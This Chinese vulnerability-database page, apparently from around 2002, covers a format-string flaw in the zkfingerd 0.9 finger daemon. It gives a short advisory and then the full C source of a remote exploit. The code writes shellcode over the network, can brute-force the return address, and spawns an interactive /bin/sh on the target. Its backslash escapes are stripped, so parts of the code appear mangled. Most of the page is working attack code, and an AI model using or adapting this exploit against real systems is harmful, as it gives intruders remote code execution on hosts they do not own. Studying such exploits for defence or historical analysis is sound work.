zkfingerd 0.9.1 – ‘say()’ Format String
漏洞ID | 1053661 | 漏洞类型 | |
发布时间 | 2002-12-16 | 更新时间 | 2002-12-16 |
CVE编号 | N/A |
CNNVD-ID | N/A |
漏洞平台 | Linux | CVSS评分 | N/A |
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
source: http://www.securityfocus.com/bid/6404/info
zkfingerd is prone to a format string vulnerability. The affected function does not perform sufficient checks when displaying user-supplied input. It is possible to corrupt memory by passing format strings through the vulnerable function. This may potentially be exploited to overwrite arbitrary locations in memory with attacker-specified values.
Successful exploitation of this issue may allow the attacker to execute arbitrary instructions, possibly, with elevated privileges.
/*
*
* remote exploit for zkfingerd-r3-0.9 linux/x86
* gives uid of user who is running zkfingerd (default: nobody)
* by Marceta Milos
* [email protected]
*
* use this for educational propouses only!
*
* For local attack, response based method could be used, but for
* remote we can use blind brute force method.
*
* greets to scut, DeadMaker, stinger, harada and all others.
*
*/
#include<stdio.h>
#include<string.h>
#include<stdlib.h>
#include<unistd.h>
#include<sys/socket.h>
#include<arpa/inet.h>
#include<netdb.h>
#define Kb 1024
#define PORT 79
#define green "x1B[1;32m"
#define def "x1B[0;37m"
#define wh "x1B[1;37m"
#define SHOFF 576
#define RETLOC 0xbffff970 /* Slackware 8.0 */
#define FMT "x25x25x2ex25x64x75x25x25x68x6e"
#define DIG8 "x25x2ex66"
#define NOP "x90"
char linux_x86_wrx[]=
"x6ax01" /* push $0x1 */
"x5b" /* pop %ebx */
"xb8x0bx6ex4ex0b" /* mov $0x0b4e6e0b,%eax */
"x2dx01x01x01x01" /* sub $0x01010101,%eax */
"x50" /* push %eax */
"x89xe1" /* mov %esp,%ecx */
"x6ax04" /* push $0x4 */
"x58" /* pop %eax */
"x89xc2" /* mov %eax,%edx */
"xcdx80" /* int $0x80 */
"xebx0c" /* jmp 12 */
"x4b" /* dec %ebx */
"xf7xe3" /* mul %ebx */
"xfexca" /* dec %dl */
"x59" /* pop %ecx */
"xb0x03" /* movb $0x3,%al */
"xcdx80" /* int $0x80 */
"xebx05" /* jmp $0x05 */
"xe8xefxffxffxff"; /* call -17 */
char linux_x86_execve[]=
"x6ax0b" /* push $0x0b */
"x58" /* pop %eax */
"x99" /* cdq */
"x52" /* push %edx */
"x68x6ex2fx73x68" /* push $0x68732f6e */
"x68x2fx2fx62x69" /* push $0x69622f2f */
"x89xe3" /* mov %esp,%ebx */
"x52" /* push %edx */
"x53" /* push %ebx */
"x89xe1" /* mov %esp,%ecx */
"xcdx80"; /* int $0x80 */
struct wr_addr {
int low;
int high;
} addr;
int host_connect(char *, unsigned short int);
unsigned long int resolve(char *);
void usage(char *);
void exploit(char *, unsigned short int, unsigned long int);
void shell(int);
struct wr_addr convert_addr(unsigned long);
char sendbuf[Kb];
char recvbuf[Kb];
char *target = "127.0.0.1";
unsigned short int port = PORT;
unsigned long retloc = RETLOC;
unsigned short int brute= 0;
int main(int argc, char **argv, char **env) {
char c;
printf(wh"n remote nobody exploit for zkfingerd-r3-0.9 by marcetam."def"nn");
if (argc<2)
usage(argv[0]);
while ((c = getopt(argc, argv, "h:p:b:")) != EOF) {
switch (c) {
case 'h':
target = optarg;
break;
case 'p':
port = (short)atoi(optarg);
break;
case 'b':
retloc = strtoul(optarg, &optarg,16);
brute = 1;
break;
default:
usage(argv[0]);
break;
}
}
printf(" target is : nn");
printf(" host : "wh"%s"def"n",target);
printf(" port : "wh"%hu"def"n",port);
printf(" ret : "wh"%#lx"def"nn",retloc);
printf(" attacking ... ");
if (brute != 0) {
while(1) {
printf("trying ret : %#lxn", retloc);
sleep(1);
exploit(target, port, retloc);
retloc -= 1;
};
} else exploit(target, port, retloc);
return(0);
}
void usage(char *name){
fprintf(stderr, " usage: %s -h <hostname> -p <port> -b <addr>nn",name);
fprintf(stderr, " -h hostt target hostname (default 127.0.0.1)n"
" -p portt port number (default 79)n"
" -b addrt brute force retloc starting from addrn"
"tt WARNING : this will flood logfilenn");
exit(EXIT_FAILURE);
}
void exploit(char *hostname, unsigned short int port, unsigned long int retaddr){
unsigned long *ptr;
char ret[4],
*chr;
int i,
fd;
bzero(sendbuf, Kb);
bzero(recvbuf, Kb);
bzero(ret, 4);
fd = host_connect(hostname, port);
ptr = (long *)ret;
*(ptr) = retaddr;
ret[sizeof(ret)] = ' ';
for(i = 0;i < 3;i++)
strcat(sendbuf,ret);
ret[0] += 2;
strcat(sendbuf, ret);
for(i = 0;i < 40; i++)
strcat(sendbuf, DIG8);
addr = convert_addr(retaddr + SHOFF);
sprintf(sendbuf + strlen(sendbuf), FMT, addr.low);
sprintf(sendbuf + strlen(sendbuf), FMT, addr.high);
chr = sendbuf + strlen(sendbuf);
for(i = 0;i < 128;i++)
strcat(sendbuf, NOP);
strcat(sendbuf, linux_x86_wrx);
write(fd, sendbuf, Kb);
read(fd, recvbuf, Kb);
if (strcmp(recvbuf, "nmMn") == 0) {
printf(green"YEAH!n"def);
sleep(1);
printf(" sending shellcode. n");
write(fd, linux_x86_execve, sizeof(linux_x86_execve));
printf(" starting shell #n"def);
write(fd,"n", 1);
write(fd,"uname -a;idn", 12);
shell(fd);
}
else printf(wh" failed.nn"def);
}
struct wr_addr convert_addr(unsigned long addr) {
struct wr_addr target;
target.low = (addr & 0x0000ffff);
target.high = (addr & 0xffff0000) >> 16;
if (target.high > target.low)
target.high -= target.low;
else {
target.high += 0x10000;
target.high -= target.low;
}
target.low -= 0x58;
return(target);
}
unsigned long int resolve(char *hostname) {
struct hostent *host;
long r;
r = inet_addr(hostname);
if (r == -1) {
host = gethostbyname(hostname);
if (host == NULL) {
return(0);
} else {
return(*(unsigned long *)host->h_addr);
}
}
return(r);
}
int host_connect(char *hostname, unsigned short int port) {
struct sockaddr_in sa;
int fd;
sa.sin_family = AF_INET;
sa.sin_port = htons(port);
fd = socket(AF_INET, SOCK_STREAM, 0);
if (fd == -1)
return(fd);
if (!(sa.sin_addr.s_addr = resolve(hostname))) {
close(fd);
return(-1);
}
if (connect(fd, (struct sockaddr *)&sa, sizeof(struct sockaddr_in)) < 0) {
perror("connect");
close(fd);
return(-1);
}
return(fd);
}
void shell(int fd) {
char buf[512];
int l;
fd_set fds;
while (1) {
FD_SET(0, &fds);
FD_SET(fd, &fds);
select(fd + 1, &fds, NULL, NULL, NULL);
if (FD_ISSET(0, &fds)) {
l = read(0, buf, sizeof (buf));
if (l <= 0) {
perror("read user");
exit(EXIT_FAILURE);
}
write(fd, buf, l);
}
if (FD_ISSET(fd, &fds)) {
l = read(fd, buf, sizeof (buf));
if (l == 0) {
printf("connection closed by foreign host.n");
exit(EXIT_FAILURE);
} else if (l < 0) {
perror("read remote");
exit(EXIT_FAILURE);
}
write(1, buf, l);
}
}
}
/* www.marcetam.net */
相关推荐: MDaemon WorldClient Folder Creation Buffer Overflow Vulnerability
MDaemon WorldClient Folder Creation Buffer Overflow Vulnerability 漏洞ID 1102140 漏洞类型 Boundary Condition Error 发布时间 2002-05-07 更新时间 …
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
喜欢就支持一下吧
恐龙抗狼扛1年前0
kankan啊啊啊啊3年前0
66666666666666